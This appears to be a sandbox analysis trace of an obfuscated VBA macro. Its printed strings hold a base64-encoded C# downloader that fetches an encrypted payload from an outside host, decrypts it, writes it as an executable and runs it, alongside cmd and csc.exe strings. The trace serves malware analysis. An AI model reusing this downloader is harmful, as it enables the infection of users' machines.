Replace("WEUxcFkzSnZjMjltZEZ3PQ=="," ","") -> WEUxcFkzSnZjMjltZEZ3PQ== Replace("XE1pY3Jvc29mdFw="," ","") -> XE1pY3Jvc29mdFw= Replace("TG1WNFpRPT0="," ","") -> TG1WNFpRPT0= Replace("LmV4ZQ=="," ","") -> LmV4ZQ== Replace("TG1Oeg=="," ","") -> TG1Oeg== Replace("LmNz"," ","") -> LmNz Replace("U2xaa1NsUnJVa3BWYVZVOQ=="," ","") -> U2xaa1NsUnJVa3BWYVZVOQ== Replace("SlZkSlRrUkpVaVU9"," ","") -> SlZkSlRrUkpVaVU9 Replace("JVdJTkRJUiU="," ","") -> JVdJTkRJUiU= Replace("WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09"," ","") -> WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09 Replace("XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ=="," ","") -> XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ== Replace("TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ=="," ","") -> TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ== Replace("L3RhcmdldDp3aW5leGUgL291dDoi"," ","") -> L3RhcmdldDp3aW5leGUgL291dDoi Replace("IiAi"," ","") -> IiAi Replace("Ig=="," ","") -> Ig== Replace("VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9"," ","") -> VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9 Replace("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q="," ","") -> U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q= Replace("dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ=="," ","") -> dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ== Replace("WTIxa0lDOWpJQT09"," ","") -> WTIxa0lDOWpJQT09 Replace("Y21kIC9jIA=="," ","") -> Y21kIC9jIA== |
Len | Len("VjFOamNtbHdkQzVUYUdWc2JBPT0=") -> 28 Len("V1NjcmlwdC5TaGVsbA==") -> 20 Len("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09") -> 32 Len("U2xWR1VWVkZVa0pXUlVWcw==") -> 24 Len("SlVGUVVFUkJWRUVs") -> 16 Len("JUFQUERBVEEl") -> 12 Len("V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09") -> 32 Len("WEUxcFkzSnZjMjltZEZ3PQ==") -> 24 Len("XE1pY3Jvc29mdFw=") -> 16 Len("TG1WNFpRPT0=") -> 12 Len("LmV4ZQ==") -> 8 Len("TG1Oeg==") -> 8 Len("LmNz") -> 4 Len("U2xaa1NsUnJVa3BWYVZVOQ==") -> 24 Len("SlZkSlRrUkpVaVU9") -> 16 Len("JVdJTkRJUiU=") -> 12 Len("WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09") -> 80 Len("XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ==") -> 60 Len("TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ==") -> 40 Len("L3RhcmdldDp3aW5leGUgL291dDoi") -> 28 Len("IiAi") -> 4 Len("Ig==") -> 4 Len("VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9") -> 48 Len("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q=") -> 36 |
Mid | |
InStr | InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","V",0) -> 22 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","j",0) -> 36 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","F",0) -> 6 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","O",0) -> 15 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","a",0) -> 27 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","m",0) -> 39 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","N",0) -> 14 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","t",0) -> 46 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","b",0) -> 28 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","H",0) -> 8 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","d",0) -> 30 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","k",0) -> 37 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","Q",0) -> 17 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","z",0) -> 52 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","U",0) -> 21 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","Y",0) -> 25 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","W",0) -> 23 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","c",0) -> 29 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","2",0) -> 55 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","J",0) -> 10 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","B",0) -> 2 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","P",0) -> 16 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","T",0) -> 20 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","0",0) -> 53 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","1",0) -> 54 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","l",0) -> 38 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","w",0) -> 49 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","C",0) -> 3 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","5",0) -> 58 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","G",0) -> 7 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","s",0) -> 45 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","A",0) -> 1 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","4",0) -> 57 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","I",0) -> 9 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","x",0) -> 50 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","p",0) -> 42 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","9",0) -> 62 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","R",0) -> 18 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","Z",0) -> 26 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","X",0) -> 24 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","S",0) -> 19 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","E",0) -> 5 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","e",0) -> 31 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","3",0) -> 56 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","q",0) -> 43 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","n",0) -> 40 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","M",0) -> 13 InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","v",0) -> 48 |
vbBinaryCompare | |
Part of subcall function MkDBatLxGyV@Module3: Hex | |
Part of subcall function MkDBatLxGyV@Module3: String | |
Part of subcall function MkDBatLxGyV@Module3: Len | |
CByte | |
ChrW | |
Mid | |
Ly | |
Lu | |
CByte | |
ChrW | |
Mid | |
Ku | |
Lu | |
CByte | |
ChrW | |
Mid | |
Fu | |
Lu | |
Left | |
Chr |
| Strings | Decrypted Strings |
|---|---|
| "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" | |
| """" | |
| """" | |
| " " | |
| """" | |
| "=" | |
| "QgkNeshGuwlwUVLrFNBeHCXOKUeLqqaMWoIWkifJ" | |
| "WvgDgBKKcxvSmGEIvmNBcVqItvziEsCKyKyKYaFK" | |
| "yUswLSWBtngZBUoBeZTYPCdTMjJiaczBRkSFEnQg" | |
| "=" | |
| "=" | |
| "yUswLSWBtngZBUoBeZTYPCdTMjJiaczBRkSFEnQg" | |
| "QgkNeshGuwlwUVLrFNBeHCXOKUeLqqaMWoIWkifJ" | |
| "WvgDgBKKcxvSmGEIvmNBcVqItvziEsCKyKyKYaFK" |
| Line | Instruction | Meta Information |
|---|---|---|
| 15 | Public Function tpqfxxQMYW(ByVal LpdVhCsOVevBGnL) | |
| 16 | Dim HEgTymDLVn as String | executed |
| 17 | HEgTymDLVn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" | |
| 18 | Dim jyneYWyYRPp, sojtzawsLTIUsxwHUAuB, GcXObzqequpTYQgk | |
| 19 | LpdVhCsOVevBGnL = Replace(LpdVhCsOVevBGnL, vbCrLf, "") | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= vbCrLf executed |
| 20 | LpdVhCsOVevBGnL = Replace(LpdVhCsOVevBGnL, vbTab, "") | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= vbTab executed |
| 21 | LpdVhCsOVevBGnL = Replace(LpdVhCsOVevBGnL, " ", "") | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= executed |
| 22 | jyneYWyYRPp = Len(LpdVhCsOVevBGnL) | Len("VjFOamNtbHdkQzVUYUdWc2JBPT0=") -> 28 executed |
| 23 | Const Ly = 1 | |
| 24 | Const Lu = 2 | |
| 25 | Const Ku = 3 | |
| 26 | Const Fu = 5 | |
| 27 | For GcXObzqequpTYQgk = 1 To jyneYWyYRPp Step 4 | |
| 28 | Dim UWoAtToURNWN, HdaVphWYujp, AgsGwUgGfRK, qLsUVVeWD, nnDweiifrwp, qnboBzImYqpoLTV | |
| 29 | UWoAtToURNWN = 3 | |
| 30 | nnDweiifrwp = 0 | |
| 31 | For HdaVphWYujp = 0 To 3 | |
| 32 | AgsGwUgGfRK = Mid(LpdVhCsOVevBGnL, GcXObzqequpTYQgk + HdaVphWYujp, 1) | Mid |
| 33 | If AgsGwUgGfRK = "=" Then | |
| 34 | UWoAtToURNWN = UWoAtToURNWN - 1 | |
| 35 | qLsUVVeWD = 0 | |
| 36 | Else | |
| 37 | qLsUVVeWD = InStr(1, HEgTymDLVn, AgsGwUgGfRK, vbBinaryCompare) - 1 | InStr(1,"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/","V",0) -> 22 vbBinaryCompare executed |
| 38 | Endif | |
| 39 | nnDweiifrwp = 64 * nnDweiifrwp + qLsUVVeWD | |
| 40 | Next | |
| 41 | nnDweiifrwp = MkDBatLxGyV(nnDweiifrwp) | |
| 42 | Dim Bobby1, Bobby2, Bobby3 | |
| 43 | Bobby1 = CByte(ChrW(JOTAkLhCyW("yUswLSWBtngZBUoBeZTYPCdTMjJiaczBRkSFEnQg", 863218)) + "H" & Mid(nnDweiifrwp, Ly, Lu)) | CByte ChrW Mid Ly Lu |
| 44 | Bobby2 = CByte(ChrW(JOTAkLhCyW("QgkNeshGuwlwUVLrFNBeHCXOKUeLqqaMWoIWkifJ", 312312)) + "H" & Mid(nnDweiifrwp, Ku, Lu)) | CByte ChrW Mid Ku Lu |
| 45 | Bobby3 = CByte(ChrW(JOTAkLhCyW("WvgDgBKKcxvSmGEIvmNBcVqItvziEsCKyKyKYaFK", 8572)) + "H" & Mid(nnDweiifrwp, Fu, Lu)) | CByte ChrW Mid Fu Lu |
| 46 | sojtzawsLTIUsxwHUAuB = sojtzawsLTIUsxwHUAuB & Left(Chr(Bobby1) + Chr(Bobby2) + Chr(Bobby3), UWoAtToURNWN) | Left Chr |
| 47 | Next | |
| 48 | tpqfxxQMYW = sojtzawsLTIUsxwHUAuB | |
| 49 | End Function |
| APIs | Meta Information |
|---|---|
Hex | |
String | |
Len | Len("56314E") -> 6 Len("6A636D") -> 6 Len("6C7764") -> 6 Len("433554") -> 6 Len("614756") -> 6 Len("736241") -> 6 Len("3D3D00") -> 6 Len("575363") -> 6 Len("726970") -> 6 Len("742E53") -> 6 Len("68656C") -> 6 Len("6C0000") -> 6 Len("553278") -> 6 Len("575231") -> 6 Len("565756") -> 6 Len("6B5A56") -> 6 Len("613070") -> 6 Len("58556C") -> 6 Len("565763") -> 6 Len("773D3D") -> 6 Len("536C56") -> 6 Len("475556") -> 6 Len("564655") -> 6 Len("6B4A57") -> 6 Len("525556") -> 6 Len("730000") -> 6 Len("4A5546") -> 6 Len("515545") -> 6 Len("524256") -> 6 Len("45456C") -> 6 Len("254150") -> 6 Len("504441") -> 6 Len("544125") -> 6 Len("574555") -> 6 Len("786346") -> 6 Len("6B7A53") -> 6 Len("6E5A6A") -> 6 Len("4D6A6C") -> 6 Len("745A45") -> 6 Len("5A3350") -> 6 Len("513D3D") -> 6 Len("584531") -> 6 Len("705933") -> 6 Len("4A7663") -> 6 Len("32396D") -> 6 Len("644677") -> 6 Len("3D0000") -> 6 Len("5C4D69") -> 6 Len("63726F") -> 6 Len("736F66") -> 6 Len("745C00") -> 6 Len("4C6D56") -> 6 Len("345A51") -> 6 Len("2E6578") -> 6 Len("650000") -> 6 Len("4C6D4E") -> 6 Len("7A0000") -> 6 Len("2E6373") -> 6 Len("536C5A") -> 6 Len("6B536C") -> 6 Len("527255") -> 6 Len("6B7056") -> 6 Len("615655") -> 6 Len("390000") -> 6 Len("4A5664") -> 6 Len("4A546B") -> 6 Len("524A55") -> 6 Len("69553D") -> 6 Len("255749") -> 6 Len("4E4449") -> 6 Len("522500") -> 6 Len("644335") -> 6 Len("4F5256") -> 6 Len("526352") -> 6 Len("6E4A68") -> 6 Len("625756") -> 6 Len("336233") -> 6 Len("4A7258") -> 6 Len("485930") -> 6 Len("4C6A41") -> 6 Len("754D7A") -> 6 Len("417A4D") -> 6 Len("546C63") -> 6 Len("59334E") -> 6 Len("6A4C6D") -> 6 Len("56345A") -> 6 Len("742E4E") -> 6 Len("45545C") -> 6 Len("467261") -> 6 Len("6D6577") -> 6 Len("6F726B") -> 6 Len("5C7634") -> 6 Len("2E302E") -> 6 Len("333033") -> 6 Len("31395C") -> 6 Len("637363") -> 6 Len("4C3352") -> 6 Len("68636D") -> 6 Len("646C64") -> 6 